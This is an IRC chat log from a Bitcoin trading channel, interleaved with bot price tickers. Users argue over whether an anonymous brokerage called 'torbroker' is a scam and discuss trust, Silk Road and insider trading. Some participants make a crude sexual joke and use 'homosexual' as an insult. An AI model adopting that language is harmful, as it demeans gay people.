very weak Apr 07 19:07:20 mircea_popescu ah yes that's a point. it's hard to do irl without revealing identity to escrow Apr 07 19:07:37 and once you do, they can just go and testify. Apr 07 19:07:45 [BTCTC] [ASICMINER-PT] 1 @ 0.776 BTC [+] Apr 07 19:07:50 so escrow is a nonstarter there. Apr 07 19:08:42 aha...they hold your positions Apr 07 19:09:03 hence brokerage...similar to coinbr Apr 07 19:09:18 MJR_ no, not similar. very very dissimilar. Apr 07 19:09:25 in that coinbr is run by a known and trusted member Apr 07 19:09:32 and this torbroker scam is not present here. Apr 07 19:09:42 I have s.dice, do you see my position on mpex? Apr 07 19:10:08 well, they have asked to put 1000btc into a trust that shows they have backing Apr 07 19:10:15 [BTCTC] [ASICMINER-PT] 1 @ 0.777 BTC [+] Apr 07 19:10:15 that does not show anything. Apr 07 19:10:22 there's a process to obtain a bitcoin financial license. Apr 07 19:10:24 they aren't following it. Apr 07 19:10:25 MJR__: you can push to escrow and show receipt Apr 07 19:10:54 lol license.. can i have a licensed badge? Apr 07 19:10:58 I meant that afaik mpex sees your account (gpg key) Apr 07 19:11:02 [BTCTC] [ASICMINER-PT] 2 @ 0.777 = 1.554 BTC [+] Apr 07 19:11:13 they don't see mine cuz I don't have one Apr 07 19:11:17 ;;getrating jurov Apr 07 19:11:19 WARNING: Currently not authenticated. User jurov, rated since Fri Jan 20 16:16:32 2012. Cumulative rating 14, from 16 total ratings. Received ratings: 15 positive, 1 negative. Sent ratings: 10 positive, 1 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=jurov Apr 07 19:11:29 obviously it's based on trust Apr 07 19:12:01 well ya. so random noob showing up on forum and proposing to "advise your wealth" or to "pls halp me r spanish mother of two" or to "supersikrit tor broker of irl securities" Apr 07 19:12:07 pretty much all boils down to the same thing. Apr 07 19:12:07 ;;goxlag Apr 07 19:12:07 MtGox lag is 75.580385 seconds. During this time, light travels 0.1514622453 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 07 19:12:10 ;;ticker Apr 07 19:12:11 BTCUSD ticker | Best bid: 161.60000, Best ask: 162.00000, Bid-ask spread: 0.40000, Last trade: 162.00000, 24 hour volume: 38378.01921193, 24 hour low: 142.01000, 24 hour high: 159.67001, 24 hour vwap: 149.13329 Apr 07 19:12:18 if you say so Apr 07 19:12:23 I don't agree Apr 07 19:12:24 all time highs Apr 07 19:12:25 lol Apr 07 19:12:35 i say and sign underneath. Apr 07 19:12:46 there aims are not even remotely similar Apr 07 19:12:52 *their Apr 07 19:13:01 since when do we care what noobs *say* ? Apr 07 19:13:08 talk is cheap, anyone can say anything. Apr 07 19:13:26 first off, we have no idea who is running this yet...right? Apr 07 19:13:35 we do. a scammer. Apr 07 19:13:40 " talk is cheap, anyone can say anything. " "What you say are just words, what matters is what you do" Apr 07 19:14:35 meanwhile irl : "Blockbuster Lawsuit: Whistleblower Alleges Reuters Releases Data Early to HFT Clients" Apr 07 19:15:45 mircea_popescu: it seems you are opposed to a ratings agency for BTC Apr 07 19:16:03 that is it would have to be established in conjunction with a pillar already in existence Apr 07 19:16:07 there's nobody with the intellectual ability to do such a thing. Apr 07 19:16:16 not even yourself? Apr 07 19:16:17 we have the wot system, it works just fine, why centralise ? Apr 07 19:16:20 not even myself. Apr 07 19:17:01 WoT will be more like WEBS of Trust since what matters is "who you trust" in conjunction with "who they trust" Apr 07 19:17:10 exactly. that's precisely what it is. Apr 07 19:17:13 and the only way this works. Apr 07 19:17:17 [BTCTC] [S.MPOE-PT] 718 @ 0.000603 = 0.433 BTC [+] Apr 07 19:17:23 rating agencies (irl) are notghing but organised shilling. Apr 07 19:17:34 [BTCTC] [S.MPOE-PT] 182 @ 0.000602 = 0.1096 BTC [-] Apr 07 19:17:46 haha Apr 07 19:17:48 the US would be C- if they were actually rating. Apr 07 19:18:07 I thought the US was C- Apr 07 19:18:50 its like AA+ now i think Apr 07 19:18:55 heh. Apr 07 19:19:02 [HAVELOCK] [VTX] 1 @ 0.407 BTC [-] Apr 07 19:19:03 [HAVELOCK] [VTX] 3 @ 0.406 = 1.218 BTC [-] Apr 07 19:19:04 [HAVELOCK] [VTX] 1 @ 0.403 BTC [-] Apr 07 19:19:05 [HAVELOCK] [VTX] 4 @ 0.401 = 1.604 BTC [-] Apr 07 19:19:06 [HAVELOCK] [VTX] 5 @ 0.4 = 2 BTC [-] Apr 07 19:19:07 [HAVELOCK] [VTX] 1 @ 0.4 BTC [-] Apr 07 19:19:08 [HAVELOCK] [VTX] 2 @ 0.4 = 0.8 BTC [-] Apr 07 19:19:30 !ticker H VTX Apr 07 19:19:32 [HAVELOCK:VTX] 1D: 0.40000000 / 0.41804054 / 0.44000000 (37 shares, 15.46749990 BTC), 7D: 0.36000000 / 0.47882522 / 0.61488800 (1057 shares, 506.11825911 BTC), 30D: 0.36000000 / 0.43457139 / 0.79900000 (13364 shares, 5807.61206815 BTC) Apr 07 19:19:49 but then i guess there's this that says: On September 14, 2012, Egan-Jones cut its rating a third time from AA to AA-, the lowest of what is considered "high grade", as a reaction to QE3. Apr 07 19:19:49 http://en.wikipedia.org/wiki/United_States_federal_government_credit-rating_downgrade Apr 07 19:19:53 so clearly some bs. Apr 07 19:20:00 http://www.resilience.org/stories/2006-12-04/closing-collapse-gap-ussr-was-better-prepared-collapse-us Apr 07 19:20:04 this is actually a pretty good read. Apr 07 19:20:12 mod6 shoudln't you be working? Apr 07 19:20:18 don't you have some test cases to run? Apr 07 19:20:22 jkjk Apr 07 19:20:41 [BTCTC] [ASICMINER-PT] 1 @ 0.777 BTC [+] Apr 07 19:20:42 he's compiling Apr 07 19:20:48 or driving lol Apr 07 19:20:53 XD Apr 07 19:20:55 = free time Apr 07 19:21:40 the rally is on Apr 07 19:25:09 [MPEX] [O.USD.C164T] 10 @ 0.15965531 = 1.5966 BTC [+] Apr 07 19:26:12 MPOE bot just made some money... Apr 07 19:26:23 !ticker m ^OIX Apr 07 19:26:24 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 104.18044961 / 119.46513967 / 153.12818005 (28218 shares, 11,837.32 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 07 19:27:14 $depth O.USD.C164T Apr 07 19:27:15 jurov: O.USD.C164T Bids: ['1000 @ 0.07139093'] Apr 07 19:27:16 jurov: Asks: ['990 @ 0.15965531'] Apr 07 19:27:28 ;;ticker Apr 07 19:27:30 BTCUSD ticker | Best bid: 160.01002, Best ask: 161.00000, Bid-ask spread: 0.98998, Last trade: 161.00000, 24 hour volume: 40447.90337002, 24 hour low: 142.01000, 24 hour high: 162.90000, 24 hour vwap: 149.81158 Apr 07 19:28:08 low volume..."rally" is impatient people who don't want to wait till Monday for some depth Apr 07 19:28:41 opposite of weekend dip now, interesting trend shift Apr 07 19:28:57 ;;estimate Apr 07 19:28:58 Next difficulty estimate | 8796662.53748 based on data since last change | 8366350.18727 based on data for last three days Apr 07 19:29:35 https://twitter.com/Mircea_Popescu/status/320831586335612928 Apr 07 19:29:45 if anyone wants to put that tweet on the chart timeline... Apr 07 19:30:53 I retweeted that this morning Apr 07 19:31:26 i had half a mind to troll that tweet Apr 07 19:31:36 since you were like bitcon stahp!! Apr 07 19:31:44 yeah lol Apr 07 19:31:45 hehe Apr 07 19:32:57 mircea_popescu: you really don't look that old in your pictures... Apr 07 19:33:02 I feel like you're in your 30's Apr 07 19:33:05 i am. Apr 07 19:33:13 lol I thought he was Apr 07 19:33:13 you had me thinking you were like 60 Apr 07 19:33:25 HAHAHAHAHAHA Apr 07 19:33:38 it must be all that "damn kids get off my lawn" Apr 07 19:34:19 lol Apr 07 19:34:34 prolly you thought only old people can have black cock Apr 07 19:35:18 LONG, BLACK AND DENSELY VEINED Apr 07 19:35:34 oops capslock Apr 07 19:35:51 lmao did drool press caps ? Apr 07 19:37:17 By declaring bitcoin illegal because bitcoins provide a way to avoid taxes the government is saying that bitcoin is a great way to avoid paying taxes. It works at transmitting and saving money anonymously. What an endorsement. "Bitcoin works so please don't use it." Apr 07 19:37:22 great quote Apr 07 19:38:34 hehe Apr 07 19:38:53 Streisand effect Apr 07 19:39:02 [HAVELOCK] [HIM] 5 @ 1.83 = 9.15 BTC [-] Apr 07 19:40:19 :( Apr 07 19:40:23 !ticker h HIM Apr 07 19:40:25 [HAVELOCK:HIM] 1D: 1.82000000 / 1.84904348 / 1.90000000 (23 shares, 42.52800000 BTC), 7D: 1.82000000 / 1.94542458 / 2.06000000 (118 shares, 229.56010000 BTC), 30D: 1.41000000 / 1.84164275 / 2.08000000 (711 shares, 1309.40799220 BTC) Apr 07 19:42:03 i wonder how many people realise just what a formbidable threat to stability and ultimately survival JIT is for the US. Apr 07 19:42:20 Just in time compilation? Apr 07 19:43:09 the entire economy is run on the jsut in time model. Apr 07 19:44:32 [BTCTC] [COGNITIVE] 2 @ 0.138 = 0.276 BTC [-] Apr 07 19:44:36 [BTCTC] [COGNITIVE] 1 @ 0.138 BTC [-] Apr 07 19:45:50 mircea_popescu: don't you have to do that when you are leveraged at such a high rate? Apr 07 19:46:17 well whether you have to or not, it still makes you vulnerable Apr 07 19:46:53 ;;bids 150 Apr 07 19:46:56 There are currently 3658.0807 bitcoins demanded at or over 150.0 USD, worth 554865.745375 USD in total. | Data vintage: 0.0104 seconds Apr 07 19:47:12 not bad Apr 07 19:49:07 I agree totally, and although credit and debt will creep into bitcoin more, I think that doing something 100:1 in BTC will seem ridiculous for a long term strategy Apr 07 19:49:27 think US banks are around 50:1 Apr 07 19:49:43 and tor broker holds your position for you Apr 07 19:50:09 MJR__ heh. Apr 07 19:50:11 think they have a Cayman Islands brokerage account Apr 07 19:50:38 and it seems reasonably certain that they are one of the operators of a minor BTC exchange Apr 07 19:50:42 basically they'll take btc and the day net outflow > net inflow they're gone. Apr 07 19:50:53 maybe... Apr 07 19:51:15 but if everyone had that mentality there's be no gox or mpex... Apr 07 19:51:24 correct? Apr 07 19:52:04 not really. Apr 07 19:52:32 not unless the guy's name actually is Tor. Apr 07 19:52:45 if everyone assumed that tux or you would definitely run off with money... Apr 07 19:52:53 but tux is a name. Apr 07 19:53:00 "torbroker" is a throwaway forum account. Apr 07 19:53:08 there's this post the girl keeps linking the noobs to. Apr 07 19:53:13 they say o sure i read it, but persevere. Apr 07 19:53:30 and then are never heard from again Apr 07 19:53:32 ah, so you think that the fact I know the name "Mircea Popescu" makes me feel safe? Apr 07 19:53:44 i don't care how it makes you feel, this isn't about feelings. Apr 07 19:53:59 mircea_popescu: what post is that? Apr 07 19:53:59 im saying anyone could disappear Apr 07 19:54:06 the "So you wanna start a bitcoin business" ? Apr 07 19:54:07 there;'s somebody with a track record to judge based on. Apr 07 19:54:12 thestringpuller yeah. Apr 07 19:54:19 what was pirates OTC rating? Apr 07 19:54:32 MJR__ this is also a discredited argument. one second Apr 07 19:54:35 did he have a forum account? Apr 07 19:54:42 mircea_popescu: thanks Apr 07 19:55:01 MJR__: yes he had, but it's not total score that counts Apr 07 19:55:06 mircea_popescu: if you found the "collapse gap" piece interesting, read Orlov's full length discussion "Post-Soviet Lessons": https://docs.google.com/document/d/1M56LtVzVcYJSMGKm5CV2RcePETqK1BwvF-Pb5AkdTXM/ Apr 07 19:55:29 asciilifeform it's funny how soviet-patriotic he is hehe. Apr 07 19:55:34 i mean, he makes little... adjustments. Apr 07 19:56:27 mircea_popescu: he's more (vaguely) Slavophilic than pro-Soviet. Apr 07 19:58:55 [BTCTC] [ASICMINER-PT] 2 @ 0.776 = 1.552 BTC [-] Apr 07 19:59:06 MJR__ https://bitcointalk.org/index.php?topic=110861.msg1227871#msg1227871 Apr 07 19:59:10 see the last coupla paragraphs Apr 07 20:01:33 [MPEX] [O.USD.P149T] 1000 @ 0.13686145 = 136.8615 BTC [-] Apr 07 20:01:46 [MPEX] [O.USD.P146T] 1000 @ 0.12462497 = 124.625 BTC [-] Apr 07 20:01:48 good post Apr 07 20:02:02 [MPEX] [O.USD.P143T] 1000 @ 0.11204236 = 112.0424 BTC [-] Apr 07 20:02:02 does not change my original point Apr 07 20:02:10 trust must be bootstrapped Apr 07 20:02:16 right. Apr 07 20:02:37 if EVERYONE did not risk trust in mpex, how could it start? Apr 07 20:02:55 better phrasing if no one decided to trust it Apr 07 20:03:09 nobody did decide to t5rust it Apr 07 20:03:16 they were on glbse Apr 07 20:03:40 yes...but now you hold the shares in sdice... Apr 07 20:03:53 we trust you will pay options out... Apr 07 20:03:57 [BTCTC] [ASICMINER-PT] 1 @ 0.777 BTC [+] Apr 07 20:04:14 am I missing something? I trust you more or less implicitly in this space Apr 07 20:04:51 but, that had to be built over time, which means at some point, someone decided to trust and risk Apr 07 20:04:57 yhou are seeing the results of a war Apr 07 20:05:06 and imagine it is the rtesult of natural evoltyion. Apr 07 20:05:06 im aware Apr 07 20:05:08 not so. Apr 07 20:05:20 mpex was built by me, and joined by people who only had any trust in btc because i said so. Apr 07 20:05:28 the btc people were flocked on glbse. Apr 07 20:05:31 not natural evolution Apr 07 20:05:35 but go on Apr 07 20:05:48 their boat sunk. i won. my people, who are in btc because they trusted me and i trusted btc, Apr 07 20:05:53 were left standing. Apr 07 20:06:00 the btc investors were left in shambles. Apr 07 20:06:13 yes, but that doesn't obviate the need for trust in you Apr 07 20:06:15 the story will repeat itself. either you have the power to draw sufficient force from outside Apr 07 20:06:22 or else you do what the holders of trust say you must do. Apr 07 20:06:38 it obviates the need for me to ASK to be trusted. Apr 07 20:06:52 you've proven it, I agree Apr 07 20:07:01 looking back it's easy to see Apr 07 20:07:07 i simply moved capital (of trust, of fiat, of w/e_) from irl to btc. Apr 07 20:07:16 i already had it, tho. Apr 07 20:07:19 yes Apr 07 20:07:20 ;;ticker Apr 07 20:07:24 BTCUSD ticker | Best bid: 156.89999, Best ask: 157.08000, Bid-ask spread: 0.18001, Last trade: 156.89999, 24 hour volume: 45819.40710651, 24 hour low: 142.01000, 24 hour high: 162.90000, 24 hour vwap: 150.64715 Apr 07 20:07:37 so if they have 1000 BTC to start (not a lot) Apr 07 20:07:51 and they say we will put this up as collateral Apr 07 20:07:58 MJR__: the trust was bootstrapped upon mircea having workable scheme from MPOE Apr 07 20:08:00 [HAVELOCK] [KCIM] 2 @ 1.208 = 2.416 BTC [+] Apr 07 20:08:04 [MPEX] [S.MPOE] 7200 @ 0.00066566 = 4.7928 BTC [+] Apr 07 20:08:04 with smickles Apr 07 20:08:10 *from -> for Apr 07 20:08:11 or nanotube Apr 07 20:08:19 or even mpex Apr 07 20:08:21 MJR__ were you here when we discussed with cads something similar yest ? Apr 07 20:08:26 yep Apr 07 20:08:30 hence my point Apr 07 20:08:35 ok. the problem is tghey are flashing 1k btc. nobody cares. Apr 07 20:08:45 if they simultaneously limited investment to no more than that it'd help. Apr 07 20:08:49 I care up to 1k BTC Apr 07 20:08:55 as it is... it's nothing. any scammer can (and indeed would) do that. Apr 07 20:09:01 well that was my obvious point Apr 07 20:09:11 [BTCTC] [S.MPOE-PT] 1 @ 0.000658 BTC [+] Apr 07 20:09:18 I would assume they would only go up to that point Apr 07 20:09:25 maybe that's false Apr 07 20:09:28 assume. assume nothing. Apr 07 20:09:34 never, ever, assume. Apr 07 20:09:45 [BTCTC] [S.MPOE-PT] 1 @ 0.000603 BTC [-] Apr 07 20:09:59 well, I agree, my point was only can you not trust them up to their reserve Apr 07 20:10:04 and jurov has a good sidepoint there : my system made sense. the system whereby you buy fiat stocks in btc makes none. Apr 07 20:10:07 and I say yes Apr 07 20:10:15 sure you can trust them up to their reserve. Apr 07 20:10:22 you familiar with the shakaru case ? Apr 07 20:10:22 I fail to see how that doesn't make sense Apr 07 20:10:27 no Apr 07 20:10:32 [BTCTC] [S.MPOE-PT] 1 @ 0.000658 BTC [+] Apr 07 20:10:38 [\\\] hey how much did you ever pay back off the shakaru fund ? Apr 07 20:11:14 [BTCTC] [GSDPT] 30 @ 0.00309 = 0.0927 BTC [+] Apr 07 20:12:04 [BTCTC] [S.MPOE-PT] 1 @ 0.000603 BTC [-] Apr 07 20:12:33 what I would say, and I don't want to delve into the relative pros and cons, is that DPR and SR, managed to create a market using trust...this is more similar to that Apr 07 20:12:52 I mean of SR specifically Apr 07 20:12:56 i don't think so. Apr 07 20:13:08 i can legally and safely buy securities right now. Apr 07 20:13:15 you can Apr 07 20:13:19 others can't Apr 07 20:13:22 i can't legally and safely buy whatever pills the sr kids do Apr 07 20:13:29 others that can't also shouldn Apr 07 20:13:30 't Apr 07 20:13:42 lol, there is where we disagree Apr 07 20:13:51 well. whty can't they ? Apr 07 20:13:54 I say it's a market Apr 07 20:13:56 [BTCTC] [ASICMINER-PT] 1 @ 0.777 BTC [+] Apr 07 20:13:58 regulation Apr 07 20:14:03 specifically. Apr 07 20:14:08 series 7, series 56 Apr 07 20:14:14 criminal record Apr 07 20:14:17 dood, just open an amex acct. Apr 07 20:14:20 wrong country Apr 07 20:14:30 what, this torbroker dood is a direct broker now. Apr 07 20:15:01 whoever they are, they have some etrade account or w/e Apr 07 20:15:09 right. Apr 07 20:15:11 they'll use their access Apr 07 20:15:23 to allow others to do anon stock trades Apr 07 20:15:29 so the huge counterparty risk they introduce is for the sake of sharing an etrade acct ?! whoa. Apr 07 20:15:34 I have inside info Apr 07 20:15:49 don't want MY name on this trade Apr 07 20:16:26 or, I want to do this quietly to not spook the market (obviously not now, too small) Apr 07 20:16:37 there is value in anon trades Apr 07 20:16:46 zup Apr 07 20:16:49 so what is normally accomplished by a complex system opf people who make millions in fgees Apr 07 20:16:57 is ghoing to be done just as wewll by a kid and his etrade acct. Apr 07 20:17:02 feel good to be a gangsta eh? Apr 07 20:17:07 which will be flagged in every sec insider trader investigation from now on. Apr 07 20:17:15 well, we'll see Apr 07 20:17:26 are you a fan of the SEC? im not Apr 07 20:17:33 makes no difference, that. Apr 07 20:17:52 if you can do as you wish with your $ or BTC Apr 07 20:17:59 then im for it Apr 07 20:18:15 do you think rules are in place to protect the little guy? Apr 07 20:18:35 plenty of rules are in place to protect the stupid little guy. Apr 07 20:18:37 maybe a few tokens... Apr 07 20:18:53 overall system is designed to benefit the big guy Apr 07 20:19:55 in any game of straight no limit poker the larger stash has better odds. Apr 07 20:19:58 and...without knowing who is behind this, or what exactly they are doing and how well, I would say that I can picture a scenario where it works Apr 07 20:20:08 this is not by design of the game of poker. this is because being bigger means you are better. Apr 07 20:20:12 and many where it doesn't Apr 07 20:20:34 ;;asks 165 Apr 07 20:20:37 There are currently 3155.8286 bitcoins offered at or under 165.0 USD, worth 513901.693219 USD in total. | Data vintage: 0.0014 seconds Apr 07 20:20:45 so i brewed this cup of coffee an hour ago and forgot about it... Apr 07 20:20:45 ChaangNoi it corrected. Apr 07 20:21:04 it was the weekend dump, finaly Apr 07 20:21:20 week however it was Apr 07 20:21:26 weak Apr 07 20:22:21 bfl shipped yet? Apr 07 20:22:34 so, only point is that a see a scenario where it could work, therefore not a stupid plan, though it may be stupidly implemented and fail Apr 07 20:23:01 [HAVELOCK] [VTX] 2 @ 0.39 = 0.78 BTC [-] Apr 07 20:23:43 i think your scenario is livresque. Apr 07 20:24:44 lol Apr 07 20:24:48 perhaps Apr 07 20:25:35 but I think it's been proven that there will be many failures and a few successes Apr 07 20:25:47 this is not statistically distributed. Apr 07 20:26:06 there are a lot of failures which can be readily identified by the fact they're not successes Apr 07 20:26:07 so I wouldn't throw out everything, and miss a success Apr 07 20:26:12 and a few successes which are obvious since day one. Apr 07 20:26:17 uyou can Apr 07 20:26:20 t miss a success. Apr 07 20:26:26 which have been obvious? Apr 07 20:26:33 all of them. no exceptions. Apr 07 20:26:44 gox was obvious? Apr 07 20:26:50 is obvious? Apr 07 20:27:02 there is no question of their current success Apr 07 20:27:15 so then what part of obvious you have tyrouible with :D Apr 07 20:27:42 they suck, I would have written them off Apr 07 20:28:07 they suck, sure. but thast's not what we're discussing. Apr 07 20:28:39 ok, I don't think their business model looked sustainable Apr 07 20:28:46 still don't Apr 07 20:29:11 I guess "success" is relative Apr 07 20:29:21 being the first to offer exchange services is not sustainable ? Apr 07 20:29:29 and dependent on time scale Apr 07 20:29:34 their busienss model is fine. their execution inept as all hell, but they have a model. Apr 07 20:29:46 Eastman Kodak was successful until they weren't Apr 07 20:30:07 we are merely trying to distinguish business from fraud here. Apr 07 20:30:08 as was barings Apr 07 20:30:12 ok Apr 07 20:30:15 fair enough Apr 07 20:30:32 I would say that torbroker seems definitely not fraudulent Apr 07 20:31:10 if their services are useful , they'll do ok Apr 07 20:32:03 we can agree to disagree on that Apr 07 20:32:21 but without any evidence of fraud, I can't call them fraudulent Apr 07 20:32:30 on what basis do you say that it "seems definitely not fraudulent" ? Apr 07 20:32:33 i can. Apr 07 20:32:45 without satisfyiong my criteria, they are a fraud. Apr 07 20:32:46 I've seen no evidence of fraud Apr 07 20:32:52 fraud is evidenced by default. Apr 07 20:32:52 ah ok Apr 07 20:33:03 everyone is fraudulent by default Apr 07 20:33:07 absolutely. Apr 07 20:33:21 this is bitcoin. occam's razor. Apr 07 20:33:28 true Apr 07 20:33:41 invitation to invest, but neglects to share business plan ? it's a ponzi. Apr 07 20:33:45 I guess I distinguish between fraudulent and trustworthy Apr 07 20:33:50 not a suspected ponzi, niot a possible ponzi, it is a ponzi i nfact. Apr 07 20:34:07 (10:30) < MJR__> I would say that torbroker seems definitely not fraudulent << i read about this. sounds great until they scam out like TorWallet Apr 07 20:34:10 TorWallet got me for like 5 BTC Apr 07 20:34:12 hence...all hedge funds are ponzis Apr 07 20:34:13 i distinguish too. it's not that they're not trustworthy. it's that they're fraudulent. Apr 07 20:34:23 that was me just testin the water there, but that was dumb. Apr 07 20:34:34 thats the only time i've gotten scammed Apr 07 20:34:49 mod6: sorry to hear it Apr 07 20:35:03 it happens. Apr 07 20:35:11 I think we disagree on the fundamental definition of fraud Apr 07 20:35:19 so impossible to progress Apr 07 20:35:24 yeah. Apr 07 20:35:36 what's your definition ? Apr 07 20:36:32 fraud is intentional deception made for personal gain or to damage another individual Apr 07 20:36:49 intentional being the key word Apr 07 20:37:19 absolutely. Apr 07 20:37:27 torbroker misrepresenting itself as a broker. Apr 07 20:37:28 that's it. Apr 07 20:38:00 ;;ticker Apr 07 20:38:01 BTCUSD ticker | Best bid: 155.50000, Best ask: 156.00000, Bid-ask spread: 0.50000, Last trade: 156.00000, 24 hour volume: 49176.84450064, 24 hour low: 142.01000, 24 hour high: 162.90000, 24 hour vwap: 151.19257 Apr 07 20:38:11 new ath.. Apr 07 20:38:16 actus non facit reum nisi mens sit rea Apr 07 20:38:44 tyes well. man's thoughts can not be on trial since the devil himself doesn't know what man thinks. Apr 07 20:38:45 no culpability without malintent Apr 07 20:39:03 their deception is intentional. Apr 07 20:39:12 that it intends to harm or it merely intends to deceive is irrelevant. Apr 07 20:39:16 but I don't think their intent is to deceive for their own benefit Apr 07 20:39:30 or to deceive at all Apr 07 20:39:33 but in fact they do deceive, and it is to their benefit. Apr 07 20:39:34 they say: Apr 07 20:39:41 what do you mean at all ? they claim to be a btc business. they're not. Apr 07 20:40:08 Pick a security to long or short. At the next market opening, we will mirror your position on the real market. Apr 07 20:40:28 Pick a security to long or short. At the next market opening, we will mirror your position... Apr 07 20:40:38 MJR_ does this thing purport to be a bitcoin busienss ? Apr 07 20:40:46 no Apr 07 20:40:51 not that I know of Apr 07 20:40:51 ... Apr 07 20:40:57 they accept bitcoins Apr 07 20:40:58 then why are we discussing it. Apr 07 20:41:00 aha. Apr 07 20:41:04 that counts. Apr 07 20:41:26 so every store that accepts dollars is a dollar business? Apr 07 20:41:30 yep. Apr 07 20:41:34 ask the us govt. Apr 07 20:41:51 in the business of dollars? or using dollars to transact Apr 07 20:41:58 I suppose Apr 07 20:42:08 it's a dollars busines. if it fails to follow the dollar rules it will be a criminal operation. Apr 07 20:42:13 pretty clear cut. Apr 07 20:42:14 anyone who "brokers" will be in two different businesses Apr 07 20:42:23 sucks for them i guess. Apr 07 20:42:24 like SR Apr 07 20:42:31 no question about legality Apr 07 20:43:13 I don't define my morals by the law, and could care less what they decide...as long as it doesn't affect me Apr 07 20:43:32 point still remains. dollar business thart fails to follow dollar rules => criominal enterprise. Apr 07 20:43:43 btc business that fails to fgollow btc rules => fraudulent operation aka scam. Apr 07 20:43:49 with anonymity, I could care less whether they rule it "homosexual" or "illegal" or "whatever" Apr 07 20:44:01 who enforces BTC rules? Apr 07 20:44:10 btc users. Apr 07 20:44:28 what's the applicable rule they are breaking? Apr 07 20:44:46 not in the wot. not known to actual btc businesspeople. Apr 07 20:45:05 is DPR in the WoT? I actually don't know Apr 07 20:45:14 not followed mpoe-pr's guide for aspiring noobies. Apr 07 20:45:21 what's dpr ? Apr 07 20:45:35 dread pirate Roberts Apr 07 20:45:44 nope. Apr 07 20:45:45 SR operator Apr 07 20:46:03 ^^^ Apr 07 20:46:04 well, he operates a trustworthy business apparently Apr 07 20:46:11 niot really. Apr 07 20:46:19 been around far longer than most Apr 07 20:46:26 and no one complains Apr 07 20:46:30 this is true. Apr 07 20:46:50 no one trusts it much, either. Apr 07 20:47:00 kinda the nature of that beast, like the outhouse. Apr 07 20:47:11 so...I see scenarios where people provide an honest service, and those who participate, do Apr 07 20:47:23 hey, I agree Apr 07 20:47:37 and there is a huge difference between legal and illegal Apr 07 20:48:49 im sure whoever uses sr trusts the pirate guy. Apr 07 20:48:51 they Apr 07 20:49:05 only point was its possible (as of the time of this post) to run an illegal business honestly, and anonymously Apr 07 20:49:07 're the periphery of btc, if indeed part of it at all. seems mostly accidental and well... who cares. Apr 07 20:49:24 are they a bitcoin business? Apr 07 20:49:34 not in the sense we're discussing here. Apr 07 20:49:40 they're not taking loans, not selling equity, etc. Apr 07 20:49:58 lol, but they accept bitcoins, torbroker has not mentioned equity or loans Apr 07 20:50:08 in BTC Apr 07 20:50:10 makomk malaimo maximian metabyte mE\Ta midnightmagic MiningBuddy mircea_popescu MJR_ MJR__ MJR_III mod6 mpexbot Apr 07 20:50:11 makomk malaimo maximian metabyte mE\Ta midnightmagic MiningBuddy mircea_popescu MJR_ MJR__ MJR_III mod6 mpexbot Apr 07 20:50:26 MJR__ torbroker has carefully avoiding making plain the fact that all customer positions are loans to it. Apr 07 20:50:31 diofferent kettle of fish. Apr 07 20:50:38 simply the coinsforpizza of stock Apr 07 20:50:45 nope. Apr 07 20:50:48 we can agree to disagree Apr 07 20:51:02 well we can, but not when the facts are clearly on one side. Apr 07 20:51:11 wait how? Apr 07 20:51:16 this conversation is really going places Apr 07 20:51:24 you are not loaning your position to them Apr 07 20:51:25 this torbroker thing takes your 10 btc, buys stocks for them which it holds. Apr 07 20:51:35 that's not coinforpizza, that's savings and loans. Apr 07 20:51:36 like any broker on earth Apr 07 20:51:41 mno. Apr 07 20:51:47 like mpex does Apr 07 20:51:50 yes. Apr 07 20:51:51 or coinbr Apr 07 20:51:54 sure/ Apr 07 20:51:59 ok Apr 07 20:52:05 so no prob so far? Apr 07 20:52:09 absolutely a huge problem Apr 07 20:52:15 nah, coinbr is homosexual scam Apr 07 20:52:17 torbroker is a scam trying to abuse a legitimate model./ Apr 07 20:52:24 jurov: hahaha Apr 07 20:53:03 again, scam would be using broker model, running off with positions and coins Apr 07 20:53:16 haven't done that...yet Apr 07 20:53:21 look. this is like a teenager declaring themselves a surgeon. Apr 07 20:53:27 never went to doctor school Apr 07 20:53:31 doesn't have the doctor diploma Apr 07 20:53:32 but he Apr 07 20:53:35 's "just like surgeons" Apr 07 20:53:38 like every fucking other BTC business out there Apr 07 20:53:38 well... no. not at all. Apr 07 20:53:41 nope. Apr 07 20:53:48 MJR__ i don't get it too. what information do you have that convinced you it's certainly legit? Apr 07 20:53:50 this equivocation is pretty much why it's a scam. Apr 07 20:53:51 except mpex of course Apr 07 20:54:20 jurov: not sure either way, agnostic. point being, innocent until proven guilty Apr 07 20:54:28 that's not workable in btc. Apr 07 20:54:33 ^agree Apr 07 20:54:38 but i think as you get burned you'll learn for yourself. Apr 07 20:54:49 I never said I'd use them Apr 07 20:54:54 btc has a learning curve even if it doesn't feel like it does. Apr 07 20:55:04 just said that I can see a scenario where they deliver as promised Apr 07 20:55:06 this is how people like kludge ended up burned. they felt like they knew. Apr 07 20:55:19 i didn't say you'd get burned with this specific one Apr 07 20:55:33 just, as you get burned, you'll see the presumption of guilt is the correct approach. Apr 07 20:55:42 im saying risk what you can afford to lose Apr 07 20:55:48 build up trust Apr 07 20:55:49 why risk ? Apr 07 20:55:57 ok... Apr 07 20:56:00 well ? Apr 07 20:56:18 just play sd Apr 07 20:56:23 noriskthere tm Apr 07 20:56:45 what is to actually physically stop anyone from taking their coins dumping on mt gox and retiring to a beach town in the Caribbean Apr 07 20:57:11 what can actually guarantee me that mpex cannot do that Apr 07 20:57:46 nothing. Apr 07 20:57:48 I see nothing that provides me an FDIC guarantee on an account Apr 07 20:57:51 ok Apr 07 20:57:53 nothing, really. if mircea_popescu run's i guess we're screwed, but we can rate him down in the WoT forever. Apr 07 20:57:55 we agree Apr 07 20:58:03 *runs Apr 07 20:58:08 and im sure he could cry about on the beach Apr 07 20:58:30 like pirate is doing now Apr 07 20:58:35 but he's here, and he says he wont, and he says he's interested in making this new econ work, not trying to hose it over. Apr 07 20:58:37 oh no the BTC people don't like me Apr 07 20:58:42 that guy is definitely coming back. Apr 07 20:58:49 he sold under 10 im sure. Apr 07 20:58:54 and I TRUST him Apr 07 20:58:55 it's KILLIONG HIM now Apr 07 20:59:00 lol I agree Apr 07 20:59:08 I trust mircea_popescu Apr 07 20:59:09 lol especially since he had like 500k BTC Apr 07 20:59:11 what an idiot Apr 07 20:59:12 and jurov Apr 07 20:59:16 MJR__: at least you have us here for months, can make some judgememnt about our character Apr 07 20:59:16 mod6 i dfon Apr 07 